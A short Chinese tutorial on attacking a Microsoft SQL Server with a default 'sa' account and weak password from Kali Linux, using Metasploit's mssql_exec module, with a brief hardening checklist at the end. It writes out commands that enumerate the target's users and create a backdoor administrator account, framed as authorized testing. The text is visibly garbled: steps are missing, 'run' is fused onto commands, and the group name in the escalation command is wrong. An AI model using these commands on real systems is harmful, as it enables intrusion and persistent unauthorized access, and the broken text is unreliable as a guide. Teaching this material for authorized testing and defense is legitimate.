2022-09-05 21:25:13
白帽黑客在Kali Linux下进行数据库密码脆弱性攻防演练的核心步骤如下,需严格遵循法律与道德规范,仅限授权测试:
一、环境准备工具与靶机
安装Kali Linux虚拟机(作为攻击方)。
搭建Sql Server靶机(作为防御方,需关闭防火墙或开放1433端口)。
确保靶机存在弱密码或未授权访问漏洞(如使用默认账户sa+空密码)。


关键参数:
RHOSTS:靶机IP地址(如192.168.1.100)。
USERNAME:数据库用户名(如sa)。
PASSWORD:数据库密码(如空或123456)。
CMD:需执行的系统命令(通过set CMD设置)。

命令:
set CMD cmd.exe /c net userrun作用:列出靶机所有用户,验证是否获取系统权限。

命令:
set CMD cmd.exe /c net user demouser 123456 /add & net localgroup administrator demouser /addrun作用:新增用户demouser并加入管理员组,实现提权。

密码策略
强制使用强密码(长度≥12位,包含大小写、数字、特殊字符)。
禁用默认账户(如sa),或修改默认名称。
网络隔离
限制数据库端口(1433)的访问范围,仅允许内网IP连接。
使用防火墙规则或安全组策略。
日志与监控
启用MSSQL审计日志,记录异常登录和命令执行行为。
部署SIEM工具(如Splunk)实时分析日志。
最小权限原则
数据库账户仅授予必要权限,避免使用db_owner或sysadmin角色。
总结:通过Metasploit的mssql_exec模块,可验证数据库弱密码导致的系统命令执行风险。防御方需从密码管理、网络隔离、日志监控三方面综合加固,杜绝类似漏洞。